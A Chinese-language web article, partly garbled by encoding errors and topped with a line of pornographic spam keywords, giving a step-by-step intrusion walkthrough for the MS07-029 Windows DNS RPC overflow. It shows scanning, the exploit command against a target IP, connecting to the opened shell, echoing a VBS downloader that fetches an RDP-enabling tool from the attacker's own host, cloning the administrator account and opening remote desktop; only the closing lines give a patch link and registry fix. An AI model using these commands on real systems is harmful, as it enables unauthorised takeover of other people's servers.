人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動(dòng)態(tài)

MS07-029漏洞利用入侵過(guò)程

發(fā)布日期:2021-12-26 08:32 | 文章來(lái)源:源碼中國(guó)

MS07-029,Windows 域名系統(tǒng) (DNS) 服務(wù)器服務(wù)的遠(yuǎn)程過(guò)程調(diào)用 (RPC) 管理接口中存在基于堆棧的緩沖區(qū)溢出。漏洞的前提是沒(méi)打補(bǔ)丁,開(kāi)啟DNS服務(wù)的所有版本W(wǎng)INDOWS 2000 Server和WINDOWS 2003 Server。
今天,就讓我?guī)ьI(lǐng)各路英豪,踏上DNS EXP之路。
我們先來(lái)看看所用工具的界面:

這就是傳說(shuō)中的利用工具,可以通殺2000SEVER,2003SEVER系統(tǒng),另外還具備了掃描功能!
先用它來(lái)對(duì)主機(jī)進(jìn)行掃描:
在我們的命令行下輸入:“dns –s 目標(biāo)IP地址”

稍等片刻,開(kāi)放的端口以及操作系統(tǒng)以出現(xiàn)在我們面前,如果出現(xiàn)了如上圖所顯示的“1029:Vulnerability”那么恭喜你,你馬上就會(huì)成功得到這臺(tái)主機(jī)的權(quán)限了
上圖意思就是1029端口存在漏洞。
現(xiàn)在我們來(lái)最關(guān)鍵的步驟――溢出:
在命令行內(nèi)輸入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系統(tǒng)的型號(hào),-2003chs即簡(jiǎn)體中文版的2003系統(tǒng),
如果是2000的系統(tǒng)就使用“-2000all”參數(shù),*.*.93.189就是我們的目標(biāo)IP地址,1029就是剛才掃描出存在漏洞的端口”。

出現(xiàn)“Attack sent ,check port 1100”字樣,說(shuō)明已經(jīng)打開(kāi)了目標(biāo)地址的1100端口,我們TELNET上去:TELNET *.*.93.189 1100

我們現(xiàn)在已經(jīng)成功的入侵了對(duì)方的電腦,并且得到了管理員的權(quán)限。
下面我給大家介紹一下如何在肉雞上面開(kāi)3389,
在命令行里輸入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
大概的意思就是在命令行創(chuàng)立一個(gè)用來(lái)下載的VBS腳本tony.vbs
然后把開(kāi)3389的工具上傳到你的個(gè)人空間,
我這里用的是火狐開(kāi)3389的工具,在命令行里輸入 cscript tony.vbs http://你空間地址/wrsky.exe c:\wrsky.exe

“wrsky.exe -c”可以克隆當(dāng)前管理員帳號(hào)
再輸入“c:\wrsky.exe -o 3551”


意思就是打開(kāi)對(duì)方的遠(yuǎn)程桌面服務(wù),并且使用3551端口。
用“wrsky.exe -k”可以檢查3389是否開(kāi)啟,開(kāi)啟以后輸入“wrsky.exe -r”,對(duì)方的電腦就自動(dòng)重啟以后就可以連接上去了。
在運(yùn)行里輸入"mstsc",登陸上去。

那熟悉而又親切的畫面出現(xiàn)在我們面前了。
如果是2K的系統(tǒng),還有一個(gè)更加傻瓜化的工具open3389,直接運(yùn)行就可以了,不需要任何參數(shù),不過(guò)對(duì)方電腦會(huì)馬上重啟。
另外我還放了其他兩個(gè)DNS利用工具和一篇ZWELL的精華文章在光盤里,有興趣的朋友可以自己研究。
這個(gè)漏洞的危害是是分巨大的,目前利用DNS服務(wù)RPC漏洞傳播的蠕蟲(chóng)病毒VanBot已經(jīng)出現(xiàn),變種已經(jīng)開(kāi)始瘋狂傳播。
WIN 2K或2003的朋友請(qǐng)趕快下載補(bǔ)丁
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx
或者打開(kāi)記事本,輸入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]
"RpcProtocol"=dword:00000004
保存為擴(kuò)展名為 .REG 的文件,雙擊導(dǎo)入,再重新啟動(dòng) DNS 服務(wù)即可。

版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實(shí)時(shí)開(kāi)通

自選配置、實(shí)時(shí)開(kāi)通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問(wèn)服務(wù)

1對(duì)1客戶咨詢顧問(wèn)

在線
客服

在線客服:7*24小時(shí)在線

客服
熱線

400-630-3752
7*24小時(shí)客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部